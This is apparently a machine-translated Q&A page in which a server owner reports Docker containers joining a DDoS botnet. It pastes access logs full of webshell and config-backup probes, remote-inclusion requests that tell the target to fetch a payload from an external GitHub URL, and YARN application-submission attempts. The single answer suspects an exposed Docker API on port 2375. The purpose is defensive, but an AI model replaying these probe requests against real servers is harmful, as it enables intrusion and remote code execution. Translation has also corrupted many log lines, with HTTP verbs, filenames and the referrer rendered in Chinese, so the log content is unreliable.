提问人:Ted Mosby 提问时间:11/9/2021 最后编辑:Ted Mosby 更新时间:11/11/2021 访问量:555
僵尸网络的 Docker 容器部分,通过 GET 请求 (DDoS)
docker container part of botnet via get requests (ddos)
问:
嗨,我从我的提供商那里收到一条消息,说我的服务器是 ddos-botnet 的一部分。因此,我调查了我的 docker 容器并发现了一些损坏的容器(jitsi-meet-web (https://github.com/jitsi/docker-jitsi-meet)、nextcloud (https://hub.docker.com/_/nextcloud) 和 nginx 容器 (https://hub.docker.com/_/nginx))。有人试图通过 GET 请求注入不安全的 wordpress 文件。
我的问题是:这怎么可能,我能做些什么来防止这种情况再次发生?
Jira、Confluence 和 Oracle DB & Ords 的容器是干净/精细的。
我的服务器作为反向代理运行。
原木:
172.17.0.1 - - [16/Sep/2021:18:09:05 +0000] “GET /style.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [2021 年 9 月 16 日:18:09:10 +0000] “GET /moduless.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:09:14 +0000] “GET /wp-content/plugins/t_file_wp/t_file_wp.php?test=hello HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:09:18 +0000] “GET /admin.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:09:22 +0000] “GET /index.php?3x=3x HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:09:24 +0000] “GET /boom.php?x HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:09:27 +0000] “GET /wp-content/plugins/backup_index.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:09:31 +0000] “GET /wp-content/db_cache.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:09:36 +0000] “GET /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:09:39 +0000] “GET /xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:09:42 +0000] “获取 /wpindex.php?idb=https://raw.github usercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1“ 404 556 ”anonymousfox.co“ ”Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:09:47 +0000] “获取/幼虫.php?idb=https://raw.github usercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1“ 404 556 ”anonymousfox.co“ ”Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:09:52 +0000] “获取 /th3_err0r.php?php=https://raw.github usercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1“ 404 556 ”anonymousfox.co“ ”Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:09:56 +0000] “GET /alfindex.php HTTP/1.1” 404 556 “匿名狐狸。co“ ”Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:09:58 +0000] “GET /alfa.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:10:07 +0000] “GET /wp-booking.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:10:11 +0000] “GET /cindex.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:10:17 +0000] “GET /wp-content/wp-1ogin_bak.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:10:21 +0000] “GET /wp-1ogin_bak.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:10:26 +0000] “GET /wp-includes/fonts/css.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:10:32 +0000] “GET /wp-includes/css/css.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:10:37 +0000] “GET /old-index.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:10:43 +0000] “GET /config.bak.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:10:48 +0000] “GET /wp-admin/config.bak.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:10:51 +0000] “GET /wp-content/config.bak.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:10:56 +0000] “GET /wp-includes/config.bak.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:11:01 +0000] “GET /wp-content/themes/config.bak.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:11:05 +0000] “GET /wp-content/plugins/config.bak.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:11:13 +0000] “GET /wp-includes/css/wp-config.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:11:17 +0000] “GET /wp-content/plugins/ubh/up.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:11:21 +0000] “GET /wp-includes/wpconfig.bak.php?act=sf HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:11:25 +0000] “GET /wp-content/plugins/wpconfig.bak.php?act=sf HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:11:29 +0000] “GET /haders.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:11:32 +0000] “GET /wp-content/wp-old-index.php?action=login&pass=-1&submit= HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:11:39 +0000] “GET /legion.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:11:43 +0000] “GET /wp-content/mu-plugins/db-safe-mode.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:11:48 +0000] “GET /wp-includes/lfx.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:11:53 +0000] “GET /wp-includes/small.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:11:56 +0000] “获取/up.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:11:59 +0000] “获取/上传.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:12:03 +0000] “GET /config.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:12:05 +0000] “获取/测试.php?ghost=send HTTP/1.1“ 404 556 ”anonymousfox.co“ ”Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:12:09 +0000] “获取 /wp-content/langar.php HTTP/1.1” 404 556 “匿名ox.co“ ”Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:12:12 +0000] “GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:12:17 +0000] “GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 172.17.0.1 - - [16/Sep/2021:18:12:22 +0000] “GET /wp-content/plugins/wpdiscuz/themes/default/style-rtl.css HTTP/1.1” 404 556 “anonymousfox.co” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”184.164.70.7” 107.189.3.183 - - [16/Sep/2021:18:42:21 +0000] “POST /ws/v1/cluster/apps/new-application HTTP/1.1” 404 154 “-” “python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.35.1.el6.x86_64” “-”
198.98.55.220 - - [10/Oct/2021:09:13:11 +0000] “POST /ws/v1/cluster/apps/new-application HTTP/1.1” 404 154 “-” “python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.35.1.el6.x86_64” “-” 172.17.0.1 - - [10/Oct/2021:09:15:43 +0000] “GET /wp-admin/css/ HTTP/1.1” 404 556 “binance.com” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”23.146.241.19” 172.17.0.1 - - [10/Oct/2021:09:15:55 +0000] “GET /.well-known/ HTTP/1.1” 404 556 “binance.com” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”23.146.241.19” 172.17.0.1 - - [10/Oct/2021:09:16:09 +0000] “GET /sites/default/files/ HTTP/1.1” 404 556 “binance.com” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”23.146.241.19” 172.17.0.1 - - [10/Oct/2021:09:16:30 +0000] “GET /admin/controller/extension/extension/ HTTP/1.1” 404 556 “binance.com” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”23.146.241.19” 172.17.0.1 - - [10/Oct/2021:09:16:41 +0000] “GET /uploads/ HTTP/1.1” 404 556 “binance.com” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”23.146.241.19” 172.17.0.1 - - [10/Oct/2021:09:16:50 +0000] “GET /images/ HTTP/1.1” 404 556 “binance.com” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”23.146.241.19” 172.17.0.1 - - [10/Oct/2021:09:17:02 +0000] “GET /files/ HTTP/1.1” 404 556 “binance.com” “Mozilla/5.0 (Windows NT 10.0;Win64的;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“ ”23.146.241.19”
答:
0赞
Ted Mosby
11/11/2021
#1
很可能使用了 docker REST API 端口 2375。
评论
sudochown